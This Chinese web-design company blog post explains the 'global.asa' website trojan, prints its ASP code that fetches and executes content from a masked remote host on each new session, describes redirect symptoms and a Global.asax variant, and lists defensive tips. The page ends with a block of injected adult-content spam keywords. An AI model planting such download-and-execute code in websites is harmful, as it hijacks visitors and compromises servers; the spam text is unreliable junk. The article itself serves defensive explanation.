十年專注于品牌網(wǎng)站建設(shè) 十余年專注于網(wǎng)站建設(shè)_小程序開發(fā)_APP開發(fā),低調(diào)、敢創(chuàng)新、有情懷!
      南昌百恒網(wǎng)絡(luò)微信公眾號 掃一掃關(guān)注
      小程序
      tel-icon全國服務(wù)熱線:400-680-9298,0791-88117053
      掃一掃關(guān)注百恒網(wǎng)絡(luò)微信公眾號
      掃一掃打開百恒網(wǎng)絡(luò)微信小程序

      百恒網(wǎng)絡(luò)

      南昌百恒網(wǎng)絡(luò)

      global.asa木馬病毒

      百恒網(wǎng)絡(luò) 2011-11-19 7920

      什么是global.asa木馬呢?

      global.asa在百度百科里是這樣介紹的:

      Global.asa 文件是一個(gè)可選的文件,它可包含可被ASP 應(yīng)用程序中每個(gè)頁面訪問的對象、變量以及方法的聲明。所有合法的瀏覽器腳本都能在Global.asa 中使用。 Global.asa 中,我們可以告知application 和session 對象在啟動和結(jié)束時(shí)做什么事情。完成此項(xiàng)任務(wù)的代碼被放置在事件操作器中。

      根據(jù)上面的介紹大家應(yīng)該大體了解了,其實(shí)這個(gè)木馬就是屬于網(wǎng)站程序木馬,也稱:腳本木馬. 但是黑客為什么會以global.asa命名呢?因?yàn)檫@個(gè)文件可以調(diào)用很多程序,比如當(dāng)客戶訪問你的網(wǎng)站的時(shí)候,可以調(diào)用跳轉(zhuǎn)的命令。正因?yàn)間lobal.asa文件作用的特殊性,所以被黑客所利用,并制作成了網(wǎng)站木馬。

      首先我們來看下global.asa木馬的代碼:

      sub Session_OnStart

      On Error Resume Next

      url="http://www.********.info:1680/global/xmlfilecode.gif"

      Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")

      ObjXMLHTTP.Open "GET",url,False

      ObjXMLHTTP.setRequestHeader "User-Agent",url

      ObjXMLHTTP.send

      GetHtml=ObjXMLHTTP.responseBody

      Set ObjXMLHTTP=Nothing

      set objStream = Server.CreateObject("Adodb.Stream")

      objStream.Type = 1

      objStream.Mode =3

      objStream.Open

      objStream.Write GetHtml

      objStream.Position = 0

      objStream.Type = 2

      objStream.Charset = "gb2312"

      GetHtml = objStream.ReadText

      objStream.Close

      set objStream=Nothing

      if instr(GetHtml,"by*aming")>0 then

      execute GetHtml

      end if

      end sub

      sub Session_OnEnd

      end sub

      < /script >

      我來給大家先解釋一下這個(gè)代碼的作用:因?yàn)間lobal.asa 文件是網(wǎng)站啟動的文件,當(dāng)一個(gè)網(wǎng)站被用戶訪問的時(shí)候,會執(zhí)行Application_Start代碼段的內(nèi)容,當(dāng)一個(gè)用戶第一次訪問時(shí)會執(zhí)行Session_Start代碼段的內(nèi)容,所以此段代碼的作用就是當(dāng)訪問的時(shí)候自動下載獲取木馬內(nèi)容,上面遇到的就是跳轉(zhuǎn)性作用的木馬代碼。

      global.asa掛馬的癥狀

      global.asa文件是隱藏性,你在FTP軟件都看不到,通過地址欄輸入FTP資料,進(jìn)入網(wǎng)站空間直接可以看到隱藏global.asa的木馬,當(dāng)用戶從百度點(diǎn)擊進(jìn)來的時(shí)候(直接輸入網(wǎng)站地址卻正常),網(wǎng)站的會自動跳轉(zhuǎn)到其他網(wǎng)站:比如色情站點(diǎn)和有病毒的網(wǎng)站。再就是百度site:自己的網(wǎng)站會發(fā)現(xiàn)收錄了許多色情頁面如下圖所示:

      也有些其他的癥狀,例如:網(wǎng)站后臺無法登陸,有的是提示 XX錯(cuò)誤 然后刷新即可訪問。這都是global.asa 劫持用戶的訪問指向。

      global.asa 母級文件Global.asax功能更可怕,我們先看下代碼

      <%@ Language="VB"%><%@ Import Namespace="System.IO"%>

      其中 if fso.FileExists("\."&Server.MapPath("/Global.asa")) then 判斷 根目錄下 Global.asa 文件是否存在,如果存就將文件屬性改為可讀可寫 代碼:f.Attributes=0 然后進(jìn)行寫入危險(xiǎn)代碼(objwriter.write(CODE2)) 再次將文件設(shè)為只讀,隱藏、系統(tǒng)屬性f.Attributes=1+2+4,你想刪除都沒那么容易。即使你刪除了創(chuàng)建一個(gè)文件夾改名為Global.asa也是毫無意義的。它很快把文件屬改掉,覆蓋掉。

      global.asa木馬詳細(xì)解決方法:

      1.要嚴(yán)格控制頁面上傳的代碼,上傳權(quán)限(包括文本編輯器FCKeditor等)重點(diǎn)防御之處.

      2.后臺登陸要加上驗(yàn)證碼,

      3.防Sql注入是必須的.

      4.密碼要經(jīng)過MD5加密.

      5.數(shù)據(jù)庫擴(kuò)展名改成普通網(wǎng)頁名稱并加密.

      6.每個(gè)頁面都要進(jìn)行管理員登陸判斷.

      南昌網(wǎng)絡(luò)公司百恒網(wǎng)絡(luò)提醒廣大站長或網(wǎng)絡(luò)公司技術(shù)人員:別忘了要把所有可疑文件全部清除,有的病毒設(shè)置系統(tǒng)屬性,需要服務(wù)器供應(yīng)該商配下,或通過他們完善的后臺進(jìn)行清理.

      詳細(xì)解決方案請點(diǎn)擊:南昌網(wǎng)站建設(shè)建議加強(qiáng)網(wǎng)站安全措施

      專業(yè),專注于南昌網(wǎng)站建設(shè)、軟件開發(fā),為用戶提供高品質(zhì)的網(wǎng)絡(luò)產(chǎn)品和優(yōu)質(zhì)的服務(wù)是我們始終追求的目標(biāo)!

      希望本文對廣大站長和網(wǎng)站建設(shè)公司技術(shù)人員有所幫助,如有不理解之處可以與南昌網(wǎng)站制作公司百恒網(wǎng)絡(luò)技術(shù)部聯(lián)系。


      400-680-9298,0791-88117053
      掃一掃關(guān)注百恒網(wǎng)絡(luò)微信公眾號
      掃一掃打開百恒網(wǎng)絡(luò)小程序

      歡迎您的光顧,我們將竭誠為您服務(wù)×

      售前咨詢 售前咨詢
       
      售前咨詢 售前咨詢
       
      售前咨詢 售前咨詢
       
      售前咨詢 售前咨詢
       
      售前咨詢 售前咨詢
       
      售后服務(wù) 售后服務(wù)
       
      售后服務(wù) 售后服務(wù)
       
      備案專線 備案專線
       
      ×
      99视频精品国在线视频艾草| 精品无人区麻豆乱码1区2区| 麻豆国产精品一二三在线观看 | 久久精品成人免费网站| 亚洲国产综合精品一区在线播放 | 精品人妻少妇一区二区| 西瓜精品国产自在现线| 日韩免费无码一区二区三区| 国产精品女在线观看| 色妞WWW精品免费视频| 国产精品久久久久久久人人看| 亚洲一区二区三区国产精品无码| 亚洲综合一区二区精品导航| 久久精品国产999大香线焦| 国产日产韩国精品视频| 99re热这里只有精品视频中文字幕| 国产成人AV无码精品| 亚洲精品NV久久久久久久久久| 日韩在线不卡视频| 日韩国产成人资源精品视频| 人妻在线日韩免费视频| 国产91成人精品亚洲精品| 国产精品嫩草影院线路| 国产精品熟女视频一区二区 | 国产精品伦理一二三区伦理 | 人妻少妇精品一区二区三区| 一本色道久久综合亚洲精品高清 | 热re99久久6国产精品免费| 久久久久久国产精品mv| 无码国产69精品久久久久网站| 亚洲AV无码成人精品区蜜桃| 久久这里只精品国产免费10| 久久这里只有精品66| 久久99热精品免费观看牛牛| 久久国产精品亚洲综合| 亚洲国产精品一区| 91精品国产亚洲爽啪在线观看| 亚洲国产高清在线精品一区| 精品久久久久久无码专区不卡| 99香蕉国产精品偷在线观看| 青娱分类视频精品免费2|